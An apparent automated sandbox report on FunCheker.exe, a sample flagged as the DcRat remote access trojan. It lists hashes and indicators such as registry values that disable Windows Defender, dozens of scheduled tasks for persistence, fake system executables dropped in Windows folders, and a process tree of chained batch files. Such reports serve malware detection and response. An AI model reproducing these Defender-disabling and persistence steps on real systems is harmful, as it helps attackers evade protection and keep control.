Analysis
-
max time kernel
150s -
max time network
82s -
platform
windows10-1703_x64 -
resource
win10-20240611-en -
resource tags
arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system -
submitted
22-07-2024 19:02
Static task
static1
Behavioral task
behavioral1
Sample
FunCheker.zip
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
FunCheker.exe
Resource
win10-20240611-en
General
-
Target
FunCheker.exe
-
Size
1.9MB
-
MD5
a69f81ab8922f56e786c95000e4ea238
-
SHA1
eec04e5776a155f4445260b46f8fa3b139ccedef
-
SHA256
c36b87352873121329f10440ce883510be4c7d829d6afe7ee28664b79cddfd8d
-
SHA512
de9a791be937925f0ab9d665e6282237f78b4b14f11e539bbcb9dd1ee95b0421a00ab841adb97ed3f41d3d92d94a569728edb486940afb690114bf825a42aeab
-
SSDEEP
49152:mIduhWrW/Si9FPOcS/up3M4vsEVXxQ4mxS5WDK:BuMr6zxSmp8Bi6I
Malware Config
Signatures
-
DcRat 55 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exereg.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3596 schtasks.exe 3116 schtasks.exe 2076 schtasks.exe 2928 schtasks.exe 3324 schtasks.exe 3484 schtasks.exe 4272 schtasks.exe 4340 schtasks.exe 2992 schtasks.exe 2788 schtasks.exe 3468 schtasks.exe 4396 schtasks.exe 1836 schtasks.exe 5004 schtasks.exe 3316 schtasks.exe 2028 schtasks.exe 4268 schtasks.exe 2060 schtasks.exe 2780 schtasks.exe 4320 schtasks.exe 3232 schtasks.exe 4724 schtasks.exe 4256 schtasks.exe 2008 schtasks.exe 704 schtasks.exe 3236 schtasks.exe 4184 schtasks.exe 672 schtasks.exe 4756 schtasks.exe 3708 schtasks.exe 1680 schtasks.exe 4116 schtasks.exe 4856 schtasks.exe 3872 schtasks.exe 5012 schtasks.exe 5100 schtasks.exe 4492 schtasks.exe 4620 schtasks.exe 4672 schtasks.exe 1808 schtasks.exe 3764 schtasks.exe 1284 schtasks.exe 2664 schtasks.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe 316 schtasks.exe 2392 schtasks.exe 3244 schtasks.exe 4040 schtasks.exe 3332 schtasks.exe 2084 schtasks.exe 5020 schtasks.exe 4476 schtasks.exe 3192 schtasks.exe 3080 schtasks.exe 3124 schtasks.exe -
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Process spawned unexpected child process 54 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2928 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3080 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4476 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3332 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3192 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4256 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 672 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2008 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4856 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3324 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3872 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5100 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4272 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3236 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3316 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3124 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4320 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2028 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1284 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2664 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2084 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4492 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4620 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3596 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4672 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4184 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3708 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5012 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4396 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3232 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3116 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1680 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2788 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4268 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2060 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4756 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1808 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2076 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2392 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 316 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2780 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3244 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4040 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 704 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4340 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3764 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1836 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5004 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3484 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4724 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3468 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5020 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4116 68 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2992 68 schtasks.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe dcrat C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe dcrat behavioral2/memory/4944-36-0x0000000000A80000-0x0000000000CA4000-memory.dmp dcrat -
Executes dropped EXE 22 IoCs
Processes:
Micrasoft.execomcommon.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exepid process 4952 Micrasoft.exe 4944 comcommon.exe 4048 explorer.exe 4732 explorer.exe 3496 explorer.exe 3236 explorer.exe 4492 explorer.exe 5088 explorer.exe 4680 explorer.exe 4392 explorer.exe 2764 explorer.exe 4260 explorer.exe 976 explorer.exe 3188 explorer.exe 4452 explorer.exe 2700 explorer.exe 2760 explorer.exe 3636 explorer.exe 5000 explorer.exe 2952 explorer.exe 4256 explorer.exe 5020 explorer.exe -
Drops file in Program Files directory 14 IoCs
Processes:
comcommon.exedescription ioc process File created C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe comcommon.exe File created C:\Program Files\Windows Multimedia Platform\cc11b995f2a76d comcommon.exe File created C:\Program Files (x86)\Internet Explorer\images\ebf1f9fa8afd6d comcommon.exe File created C:\Program Files (x86)\WindowsPowerShell\Configuration\5940a34987c991 comcommon.exe File created C:\Program Files\Windows NT\TableTextService\dllhost.exe comcommon.exe File created C:\Program Files\Windows NT\TableTextService\5940a34987c991 comcommon.exe File created C:\Program Files (x86)\Windows Mail\en-US\6dd19aba3e2428 comcommon.exe File created C:\Program Files\Windows Multimedia Platform\winlogon.exe comcommon.exe File created C:\Program Files (x86)\Internet Explorer\images\cmd.exe comcommon.exe File created C:\Program Files\Uninstall Information\comcommon.exe comcommon.exe File created C:\Program Files\Uninstall Information\a1e76cf482601b comcommon.exe File created C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe comcommon.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe comcommon.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\56085415360792 comcommon.exe -
Drops file in Windows directory 6 IoCs
Processes:
comcommon.exedescription ioc process File created C:\Windows\SchCache\ebf1f9fa8afd6d comcommon.exe File created C:\Windows\en-US\csrss.exe comcommon.exe File created C:\Windows\en-US\886983d96e3d3e comcommon.exe File created C:\Windows\uk-UA\sppsvc.exe comcommon.exe File created C:\Windows\uk-UA\0a1fd5f707cd16 comcommon.exe File created C:\Windows\SchCache\cmd.exe comcommon.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 24 IoCs
Processes:
explorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeMicrasoft.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exereg.exereg.execomcommon.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exereg.exeexplorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings Micrasoft.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings comcommon.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 54 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3316 schtasks.exe 704 schtasks.exe 5020 schtasks.exe 4856 schtasks.exe 1284 schtasks.exe 4756 schtasks.exe 1680 schtasks.exe 2076 schtasks.exe 3332 schtasks.exe 3192 schtasks.exe 3124 schtasks.exe 2664 schtasks.exe 3596 schtasks.exe 5004 schtasks.exe 5100 schtasks.exe 4272 schtasks.exe 4320 schtasks.exe 3468 schtasks.exe 4396 schtasks.exe 4340 schtasks.exe 4724 schtasks.exe 2060 schtasks.exe 2028 schtasks.exe 5012 schtasks.exe 3116 schtasks.exe 4040 schtasks.exe 3324 schtasks.exe 3708 schtasks.exe 2788 schtasks.exe 4256 schtasks.exe 4116 schtasks.exe 3232 schtasks.exe 3080 schtasks.exe 3236 schtasks.exe 2084 schtasks.exe 3244 schtasks.exe 4672 schtasks.exe 4184 schtasks.exe 2392 schtasks.exe 2780 schtasks.exe 2928 schtasks.exe 3872 schtasks.exe 4620 schtasks.exe 2992 schtasks.exe 4492 schtasks.exe 316 schtasks.exe 3484 schtasks.exe 4476 schtasks.exe 672 schtasks.exe 1808 schtasks.exe 4268 schtasks.exe 2008 schtasks.exe 3764 schtasks.exe 1836 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 37 IoCs
Processes:
comcommon.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exepid process 4944 comcommon.exe 4944 comcommon.exe 4944 comcommon.exe 4944 comcommon.exe 4944 comcommon.exe 4944 comcommon.exe 4944 comcommon.exe 4944 comcommon.exe 4944 comcommon.exe 4944 comcommon.exe 4944 comcommon.exe 4944 comcommon.exe 4944 comcommon.exe 4944 comcommon.exe 4944 comcommon.exe 4944 comcommon.exe 4944 comcommon.exe 4048 explorer.exe 4732 explorer.exe 3496 explorer.exe 3236 explorer.exe 4492 explorer.exe 5088 explorer.exe 4680 explorer.exe 4392 explorer.exe 2764 explorer.exe 4260 explorer.exe 976 explorer.exe 3188 explorer.exe 4452 explorer.exe 2700 explorer.exe 2760 explorer.exe 3636 explorer.exe 5000 explorer.exe 2952 explorer.exe 4256 explorer.exe 5020 explorer.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
Processes:
comcommon.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exedescription pid process Token: SeDebugPrivilege 4944 comcommon.exe Token: SeDebugPrivilege 4048 explorer.exe Token: SeDebugPrivilege 4732 explorer.exe Token: SeDebugPrivilege 3496 explorer.exe Token: SeDebugPrivilege 3236 explorer.exe Token: SeDebugPrivilege 4492 explorer.exe Token: SeDebugPrivilege 5088 explorer.exe Token: SeDebugPrivilege 4680 explorer.exe Token: SeDebugPrivilege 4392 explorer.exe Token: SeDebugPrivilege 2764 explorer.exe Token: SeDebugPrivilege 4260 explorer.exe Token: SeDebugPrivilege 976 explorer.exe Token: SeDebugPrivilege 3188 explorer.exe Token: SeDebugPrivilege 4452 explorer.exe Token: SeDebugPrivilege 2700 explorer.exe Token: SeDebugPrivilege 2760 explorer.exe Token: SeDebugPrivilege 3636 explorer.exe Token: SeDebugPrivilege 5000 explorer.exe Token: SeDebugPrivilege 2952 explorer.exe Token: SeDebugPrivilege 4256 explorer.exe Token: SeDebugPrivilege 5020 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
FunCheker.execmd.execmd.exeMicrasoft.exedescription pid process target process PID 4756 wrote to memory of 4952 4756 FunCheker.exe Micrasoft.exe PID 4756 wrote to memory of 4952 4756 FunCheker.exe Micrasoft.exe PID 4756 wrote to memory of 4952 4756 FunCheker.exe Micrasoft.exe PID 4756 wrote to memory of 2280 4756 FunCheker.exe cmd.exe PID 4756 wrote to memory of 2280 4756 FunCheker.exe cmd.exe PID 4756 wrote to memory of 3800 4756 FunCheker.exe cmd.exe PID 4756 wrote to memory of 3800 4756 FunCheker.exe cmd.exe PID 4756 wrote to memory of 3228 4756 FunCheker.exe cmd.exe PID 4756 wrote to memory of 3228 4756 FunCheker.exe cmd.exe PID 3800 wrote to memory of 2076 3800 cmd.exe chcp.com PID 3800 wrote to memory of 2076 3800 cmd.exe chcp.com PID 3228 wrote to memory of 4748 3228 cmd.exe reg.exe PID 3228 wrote to memory of 4748 3228 cmd.exe reg.exe PID 3228 wrote to memory of 3640 3228 cmd.exe reg.exe PID 3228 wrote to memory of 3640 3228 cmd.exe reg.exe PID 3228 wrote to memory of 316 3228 cmd.exe reg.exe PID 3228 wrote to memory of 316 3228 cmd.exe reg.exe PID 3228 wrote to memory of 208 3228 cmd.exe reg.exe PID 3228 wrote to memory of 208 3228 cmd.exe reg.exe PID 3228 wrote to memory of 1888 3228 cmd.exe reg.exe PID 3228 wrote to memory of 1888 3228 cmd.exe reg.exe PID 3228 wrote to memory of 2784 3228 cmd.exe reg.exe PID 3228 wrote to memory of 2784 3228 cmd.exe reg.exe PID 3228 wrote to memory of 4676 3228 cmd.exe reg.exe PID 3228 wrote to memory of 4676 3228 cmd.exe reg.exe PID 3228 wrote to memory of 704 3228 cmd.exe reg.exe PID 3228 wrote to memory of 704 3228 cmd.exe reg.exe PID 3228 wrote to memory of 1844 3228 cmd.exe reg.exe PID 3228 wrote to memory of 1844 3228 cmd.exe reg.exe PID 3228 wrote to memory of 1652 3228 cmd.exe reg.exe PID 3228 wrote to memory of 1652 3228 cmd.exe reg.exe PID 3228 wrote to memory of 4948 3228 cmd.exe reg.exe PID 3228 wrote to memory of 4948 3228 cmd.exe reg.exe PID 3228 wrote to memory of 800 3228 cmd.exe reg.exe PID 3228 wrote to memory of 800 3228 cmd.exe reg.exe PID 4952 wrote to memory of 2256 4952 Micrasoft.exe WScript.exe PID 4952 wrote to memory of 2256 4952 Micrasoft.exe WScript.exe PID 4952 wrote to memory of 2256 4952 Micrasoft.exe WScript.exe PID 3228 wrote to memory of 3484 3228 cmd.exe reg.exe PID 3228 wrote to memory of 3484 3228 cmd.exe reg.exe PID 3228 wrote to memory of 4688 3228 cmd.exe reg.exe PID 3228 wrote to memory of 4688 3228 cmd.exe reg.exe PID 3228 wrote to memory of 5020 3228 cmd.exe reg.exe PID 3228 wrote to memory of 5020 3228 cmd.exe reg.exe PID 3228 wrote to memory of 3916 3228 cmd.exe schtasks.exe PID 3228 wrote to memory of 3916 3228 cmd.exe schtasks.exe PID 3228 wrote to memory of 3396 3228 cmd.exe schtasks.exe PID 3228 wrote to memory of 3396 3228 cmd.exe schtasks.exe PID 3228 wrote to memory of 2020 3228 cmd.exe schtasks.exe PID 3228 wrote to memory of 2020 3228 cmd.exe schtasks.exe PID 3228 wrote to memory of 3556 3228 cmd.exe schtasks.exe PID 3228 wrote to memory of 3556 3228 cmd.exe schtasks.exe PID 3228 wrote to memory of 2088 3228 cmd.exe schtasks.exe PID 3228 wrote to memory of 2088 3228 cmd.exe schtasks.exe PID 3228 wrote to memory of 3024 3228 cmd.exe reg.exe PID 3228 wrote to memory of 3024 3228 cmd.exe reg.exe PID 3228 wrote to memory of 440 3228 cmd.exe reg.exe PID 3228 wrote to memory of 440 3228 cmd.exe reg.exe PID 3228 wrote to memory of 4940 3228 cmd.exe reg.exe PID 3228 wrote to memory of 4940 3228 cmd.exe reg.exe PID 3228 wrote to memory of 2260 3228 cmd.exe reg.exe PID 3228 wrote to memory of 2260 3228 cmd.exe reg.exe PID 3228 wrote to memory of 4600 3228 cmd.exe reg.exe PID 3228 wrote to memory of 4600 3228 cmd.exe reg.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"3⤵PID:2256
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "4⤵PID:1476
-
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4944 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iQWRCQKxyP.bat"6⤵PID:3584
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:4088
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"7⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4048 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eUivgxqvfs.bat"8⤵PID:4564
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵PID:4624
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"9⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4732 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Jobc5AEC9X.bat"10⤵PID:4180
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:211⤵PID:3440
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"11⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3496 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\F4MZx53eLu.bat"12⤵PID:2276
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:213⤵PID:3872
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"13⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3236 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\guIa2jZB2U.bat"14⤵PID:1284
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:215⤵PID:4104
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"15⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4492 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KxKP0srito.bat"16⤵PID:4560
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:217⤵PID:3232
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"17⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5088 -
